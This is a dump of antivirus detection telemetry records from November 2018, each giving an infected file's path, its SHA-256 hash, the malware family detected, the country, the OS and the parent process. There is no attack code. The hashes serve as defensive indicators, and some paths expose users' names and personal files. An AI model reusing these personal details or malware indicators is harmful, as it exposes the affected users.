  Row(detection=Row(filename='rossorabbitintrouble.exe', filepath='E:\\العاب\\جزرة الأرنوب\\RossoRabbitInTrouble.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='76ee4527b42e705ddd5a24dba7cb044d23dcdc20b51f8431f6071cff5bade2e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:31:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274030.pif', filepath='F:\\scan-peta-wb-sp2010\\3274030\\3274030.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scilexer.dll', filepath='C:\\Program Files\\Adobe\\Adobe Utilities\\ExtendScript Toolkit 2\\SciLexer.dll', filesize=752000, name='W32/Ramnit.C.#M1.#R1'), hash='a49cbd9baa2a5809d79b819039fdb3ff937e7375823b8e90829dadeb71f81433', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:00:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='proquota.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\proquota.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='b9fcf5356958e1adde749771f7c38ddaa2332a18e3c027a89d24c58849bfdd7d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151329-830083b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151010-6BE62586\\AVSCAN-20181102-151329-830083B3', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:11:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\jay2z0w0csj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541092906.5bdb362a56936', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Free\\114254988.exe', parentsize=671232, timestamp='2018-11-02T02:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='G:\\Driver ordenador Pepe\\Acer Aspire 5620 Montañeta\\utilities\\Acer ePresentation Management  1.1.4.819\\ePresent\\Setup.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='9888fe745d7489846cf67b43dc786672392908271f585d0a5266fa3d9ab1eeba', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155150-8e2d2d30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-154749-72323BAA\\AVSCAN-20181102-155150-8E2D2D30', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183604-5286c7d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15dd5c26\\AVSCAN-20181102-183535-4DFBA5F7\\AVSCAN-20181102-183604-5286C7D7', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b4ac50029c465ed3323b09edc040585f37aa11359f1d2eaf010ce059d90ae880', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\y2ytlslfxro\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152234-06016165', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10b881be\\AVSCAN-20181102-152217-02B51100\\AVSCAN-20181102-152234-06016165', filesize=64000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='b97aa27eb3dd4abce9535c6fa5f5c41cce6fe14a47ad2d4fc3f653305fae10dd', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gdiplus.dll', filepath='C:\\Program Files (x86)\\OpenOffice 4\\program\\gdiplus.dll', filesize=1860000, name='W32/Ramnit.C.#M1.#R1'), hash='b3b1614ba01b3e6e1788e5f8b8ff0fa4dca6f673fa7d00e28dfb033e26972b57', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T03:24:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\abqbwsoseaf\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9f6f21ac73adafba481563b4aca73c3494ee814eefcd895f798778ff96c04351', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T14:58:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023a89a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a89a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b533', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b533', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:14:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jewelquest.exe', filepath='C:\\Program Files\\GameHouse\\JewelQuest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7388e48476a747697edc7a875d41f0df0e39033a44e40a82904e4aca8aeabb6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T02:23:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023be49', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023be49', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:24:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190702-95cdd107', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-190702-95CDD107', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:07:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002380c6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002380c6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:17:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239585', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239585', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:40:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='db96342ffa58d091c3392b128b81806bf029da4ae8acca521f5a091fec682a85', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DB96342FFA58D091C3392B128B81806BF029DA4AE8ACCA521F5A091FEC682A85', filesize=1856000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='db96342ffa58d091c3392b128b81806bf029da4ae8acca521f5a091fec682a85', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:05:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091327-fe31de30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091327-FE31DE30', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293429', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293429', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:26:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eae2d1fa17862ce5314ac63a56f26caed9623d3e4c3f2e74d831aca72a0beb21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EAE2D1FA17862CE5314AC63A56F26CAED9623D3E4C3F2E74D831ACA72A0BEB21', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eae2d1fa17862ce5314ac63a56f26caed9623d3e4c3f2e74d831aca72a0beb21', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:48:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Program Files (x86)\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='f3bddeb44cd22f046cc90170314cc32cef997b98375d64aab286fcffe97f8feb', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T23:30:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dhl invoice notification-awb no 264772786300.msg', filepath='\\\\?\\D:\\Mladen\\Sacuvani email\\Reinstalacija-31.10.2018\\Email-31.10.2018-deleted\\DHL Invoice Notification-AWB NO 264772786300.msg', filesize=448000, name='HEUR/AGEN.1001615.#M1.#R1'), hash='f06413440e338162a5f19dfc3328b2bf96dd39f225a8a08ad8764d50574b8d68', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174811-1fa8a5bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0845e96a\\AVSCAN-20181101-174645-0FEFE8A3\\AVSCAN-20181101-174811-1FA8A5BB', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regfix.exe', filepath='\\\\?\\G:\\Game_Coll\\السمكة الجديدة\\resources\\regfix.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='f74bb75790a07202840a7b80c40b76cbd5aefd2440182efe4bfb9932b9ea0917', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:28:13Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-082804-9d5a65a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082804-9D5A65A1', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161737-5fb958bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161737-5FB958BB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='export.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\FusionCharts\\export\\export.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000073fa', filepath='C:\\Windows\\Temp\\a80d3f62-da9e-492a-8f9e-13c054dda98b\\tmp0000027c\\tmp000073fa', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='426b42df997d405984924d9b1c637b86b8405c1f9c5bdbff8e3083e76e0281ff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.3.915.11577\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10116804\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/ref:ZZR0c1+7WwQozHV0S6oHES7ebnxL8A0TJt9rfFSyCggy02l8XaEQUzTPdDZM4QRePN5oP1K5HV413CA7W6gXw+0 \\\\\\/host:ZiR0cVwLWwYrfHVqSggQDiNkfmtOAQkEYGJmaU8DF14qNC5tBXJoPmAGHU4sZ2krXxNHTid2N3QfAV4 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\FFSetupLatest (2).exe', parentsize=1824904, timestamp='2018-11-02T02:49:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080002-3bd0afdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080002-3BD0AFDC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155732-6ac26b76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40ba6c09\\AVSCAN-20181102-155130-3C8576E2\\AVSCAN-20181102-155732-6AC26B76', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\24DABBE3279F895D09D49475F6A79EB854ECC6C488038E22A9B5171DD4D069AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp4381638\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Bit335D.tmp.exe', parentsize=2690240, timestamp='2018-11-02T00:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gax.dll', filepath='\\\\?\\C:\\2\\gax.dll', filesize=64000, name='HEUR/AGEN.1021032.#M1.#R1'), hash='4c109b84a1de96271c211a618011bdf2fc6e1777f5b000edd164a644fd19cf0e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:10:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clickjogos - bob esponja - dilema da entrega.exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Bob Esponja - Dilema da Entrega.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='52b3f06f79be6ae05541174ce6ca27c2dae93b11b83b1c35125068e920f4f2de', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T23:42:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-20-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T03:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1254700\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101857-960d55c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101857-960D55C1', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3A5E26416CED265E1D0F270AC3B717E83A707A06EFE6655B6B3D89847A8B6610', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:03:19Z'), dt=datetime.date(2018, 11, 2)),
